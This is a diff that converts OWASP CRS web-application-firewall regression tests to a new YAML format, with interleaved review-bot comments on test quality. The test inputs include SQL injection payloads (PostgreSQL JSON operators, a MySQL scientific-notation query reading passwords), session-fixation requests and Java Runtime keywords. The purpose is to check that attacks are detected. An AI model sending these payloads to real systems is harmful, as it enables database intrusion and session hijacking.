[942550] + - test_id: 29 desc: | JSON in SQL (ARGS) decoded payload: OR '{"name":"asd"}' ?| array['a','name'] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 
"id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 30 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"name":"asd"}' ?| array['a','name'] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 31 desc: | JSON in SQL (ARGS) decoded payload: OR '{"name":"asd"}' ?& array['a','name'] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" - version: 
HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 32 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"name":"asd"}' ?& array['a','name'] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-33 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 33 desc: | JSON in SQL (ARGS) decoded payload: OR '[1,2,3]'::json ->> 2='3' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-34 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + 
User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 34 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '[1,2,3]'::json ->> 2='3' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-35 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 35 desc: | JSON in SQL (ARGS) decoded payload: OR '{"a":1}'::jsonb #> '{a,b}' ? 
'c' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-36 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 36 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"a":1}'::jsonb #> '{a,b}' ? 'c' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" - version: HTTP/1.0 - output: - log_contains: id "942550" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml index 8e1cbfb5d..091b97236 100644 
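Review bot: Every case in this file asserts `expect_ids: [942550]`; there is no negative case, so a regex that also matches benign JSON in a parameter (a literal `{"a":1}` value without a `::json` cast or a JSON operator) would still pass the whole suite after this migration. Adding at least one false-positive test in the new `log:` form with `no_expect_ids: [942550]`, as below, guards the rule's precision alongside its coverage; if 942550 only keys on the cast and operator syntax, as the existing positive payloads suggest, it should pass as-is. Separately, the payload in tests 23 and 24 spells `unnset(` where the PostgreSQL function is `unnest(`; it is carried over unchanged and presumably irrelevant to what the rule keys on (the `@>` operator), but the desc presents it as a working query, so either correct it or note the typo in the desc.

```yaml
# … unchanged: tests 1–36 …
  - test_id: 37
    desc: "False positive test: plain JSON object in a parameter, no JSON cast or operator"
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Host: localhost
            User-Agent: "OWASP CRS test agent"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          method: POST
          port: 80
          uri: "/post"
          data: "id=%7B%22a%22%3A1%2C%20%22b%22%3A2%7D"
          version: HTTP/1.0
        output:
          log:
            no_expect_ids: [942550]
```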
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml
@@ -2,40 +2,39 @@ meta: author: "Xhoenix, azurit" description: MySQL Scientific Notation bypass payloads Detection - enabled: true - name: 942560.yaml +rule_id: 942560 tests: - - test_title: 942560-1 + - test_id: 1 desc: "Positive test for Scientific Notation in MySQL, e.g 1.e(" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - data: "email=1.e(ascii+1.e(substring(1.e(select+password+from+users+limit+1+1.e,1+1.e)+1.e,1+1.e,1+1.e)1.e)1.e)+=+70+or'1'='2" - version: HTTP/1.0 - output: - log_contains: id "942560" - - test_title: 942560-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + data: "email=1.e(ascii+1.e(substring(1.e(select+password+from+users+limit+1+1.e,1+1.e)+1.e,1+1.e,1+1.e)1.e)1.e)+=+70+or'1'='2" + version: HTTP/1.0 + output: + log: + expect_ids: [942560] + - test_id: 2 desc: "Status Page Test - simplified positive test for Scientific Notation in MySQL, e.g 1.e(" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "foo=1.e(ascii)" - version: HTTP/1.0 - output: - log_contains: id "942560" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "foo=1.e(ascii)" + version: HTTP/1.0 + output: + log: + expect_ids: [942560] 
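Review bot: Test 1 sends its payload as a request body on a GET with no Content-Type header (`method: GET`, `uri: "/get"`, `data: "email=1.e(..."`), so whether the engine ever parses that body into inspectable arguments depends on body-processor behaviour the file does not state. If the intent is to exercise argument inspection, carrying the payload in the query string or switching to POST with `Content-Type: application/x-www-form-urlencoded` would make the test self-evidently valid; if the bodied GET is deliberate, the `desc` should say so. Test 2 (POST with `data: "foo=1.e(ascii)"`) likewise sends a body without any Content-Type header. Both request shapes were carried over verbatim from the old format, so this predates the migration but the rewrite is the moment to settle it.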
diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml index 1713247d8..56e504cef 100644 --- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml +++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml 
@@ -1,49 +1,47 @@ --- meta: author: "csanders-git, azurit" - description: None - enabled: true - name: 943100.yaml +rule_id: 943100 tests: - - test_title: 943100-1 + - test_id: 1 desc: Session Fixation Attack (943100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: '/get/foo.php?bar=blah' - version: HTTP/1.1 - output: - log_contains: id "943100" - - test_title: 943100-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/get/foo.php?bar=blah' + version: HTTP/1.1 + output: + log: + expect_ids: [943100] + - test_id: 2 desc: "Status Page Test - Possible Session Fixation Attack: Part of Setting Cookie Values in ARG" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/foo.php?test=.cookie;expires=" - version: HTTP/1.1 - output: - log_contains: id "943100" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + 
Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/foo.php?test=.cookie;expires=" + version: HTTP/1.1 + output: + log: + expect_ids: [943100] diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml index 0802f4f46..f0a02000d 100644 --- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml +++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml 
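Review bot: Test 1 asserts `expect_ids: [943100]`, but its request (`uri: '/get/foo.php?bar=blah'`, no Cookie header, `Referer: http`) shows nothing resembling the cookie-setting pattern that test 2 carries in `test=.cookie;expires=`, so a reader cannot tell from the file what is supposed to match. Either the `desc` should name the element that triggers the rule, or the test should be checked for whether it still exercises 943100 at all. `Referer: http` in both tests also looks like a truncated value that was copied across unchanged; if it is intentional, a short `# intentionally malformed Referer` comment above it would prevent someone "repairing" it later.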
@@ -1,85 +1,83 @@ --- meta: author: "csanders-git, azurit" - description: None - enabled: true - name: 943110.yaml +rule_id: 943110 tests: - - test_title: 943110-1 + - test_id: 1 desc: Session Fixation Attack (943110) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http://www.attackersite.com/test - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" - version: HTTP/1.1 - output: - log_contains: id "943110" - - test_title: 943110-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http://www.attackersite.com/test + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" + version: HTTP/1.1 + output: + log: + expect_ids: [943110] + - test_id: 2 desc: "session fixation attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Referer: "https://localhost.attackersite.com/" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?phpsessid=asdfdasfadsads" - version: HTTP/1.0 - output: - log_contains: id "943110" - - test_title: 943110-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Referer: "https://localhost.attackersite.com/" 
+ User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?phpsessid=asdfdasfadsads" + version: HTTP/1.0 + output: + log: + expect_ids: [943110] + - test_id: 3 desc: "session fixation attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Referer: "https://attackersite.com/" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?phpsessid=asdfdasfadsads" - version: HTTP/1.0 - output: - log_contains: id "943110" - - test_title: 943110-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Referer: "https://attackersite.com/" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?phpsessid=asdfdasfadsads" + version: HTTP/1.0 + output: + log: + expect_ids: [943110] + - test_id: 4 desc: Session Fixation Attack (943110) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Referer: http://localhost/test - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" - version: HTTP/1.1 - output: - no_log_contains: id "943110" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: 
application/x-www-form-urlencoded + Host: localhost + Referer: http://localhost/test + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" + version: HTTP/1.1 + output: + log: + no_expect_ids: [943110] diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml index 9350814a3..33a874629 100644 --- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml +++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml @@ -1,27 +1,25 @@ --- meta: author: "csanders-git, azurit" - description: None - enabled: true - name: 943120.yaml +rule_id: 943120 tests: - - test_title: 943120-1 + - test_id: 1 desc: Session Fixation Attack (943120) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" - version: HTTP/1.1 - output: - log_contains: id "943120" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" + version: HTTP/1.1 + output: + log: + expect_ids: [943120] 
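Review bot: Test 4 is the negative counterpart of test 1 (`no_expect_ids: [943110]`, the same `jsessionid` URI, only the Referer changing from `http://www.attackersite.com/test` to `http://localhost/test`) yet it reuses test 1's `desc` word for word, so the purpose of the only no-match case in the file is invisible without reading the assertion; suggest `desc: "Negative: jsessionid in ARGS with same-host Referer must not trigger 943110"`. Tests 2 and 3 likewise share the bare desc `"session fixation attack"` while differing only in the Referer host (`localhost.attackersite.com` vs `attackersite.com`), which is the variable under test and worth naming in each desc, e.g. `desc: "phpsessid in ARGS with Referer on an attacker subdomain that embeds the target hostname"`.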
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml index 9cbf3d272..89a8f7567 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml @@ -1,27 +1,25 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944000.yaml" - description: "Description" +rule_id: 944000 tests: - - test_title: 944000-1 + - test_id: 1 desc: Using text/plain Content-Type which do not have any bodyprocessor associated stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - version: HTTP/1.0 - uri: "/post" - data: "test=value" - output: - no_log_contains: "id \"944000\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + uri: "/post" + data: "test=value" + output: + log: + no_expect_ids: [944000] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml index 80705038d..c1a60d1d6 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml 
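Review bot: The only test in this file is a negative one (`no_expect_ids: [944000]`), so nothing here would notice if rule 944000 were missing or disabled; if, as the desc hints, 944000 is a helper that never logs on its own, a comment such as `# 944000 configures body handling for text/plain and never logs by itself; positive coverage lives in the 944100/944110 tests` would explain why no positive case exists (the reference to the sibling files is my inference and should be confirmed). Separately, this file and the 944100/944110 hunks quote `dest_addr: "127.0.0.1"` and `Host: "localhost"` while 942560 and the 943xxx files leave the same values plain; a mass reformat like this commit is the natural moment to pick one quoting style.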
@@ -1,373 +1,371 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944100.yaml" - description: "Description" +rule_id: 944100 tests: - - test_title: 944100-1 + - test_id: 1 desc: Argument test includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/x-www-form-urlencoded" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=java.lang.Runtime" - output: - log_contains: "id \"944100\"" - - test_title: 944100-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/x-www-form-urlencoded" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=java.lang.Runtime" + output: + log: + expect_ids: [944100] + - test_id: 2 desc: Argument test includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=java.lang.ProcessBuilder" - output: - log_contains: "id \"944100\"" - - test_title: 944100-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=java.lang.ProcessBuilder" + output: + log: + expect_ids: [944100] + - test_id: 3 desc: Argument name includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.lang.Runtime=test" - output: - log_contains: "id \"944100\"" - - test_title: 944100-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.lang.Runtime=test" + output: + log: + expect_ids: [944100] + - test_id: 4 desc: Argument name includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.lang.ProcessBuilder=test" - output: - log_contains: "id \"944100\"" - - test_title: 944100-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP 
CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.lang.ProcessBuilder=test" + output: + log: + expect_ids: [944100] + - test_id: 5 desc: Cookie test includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.lang.Runtime - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 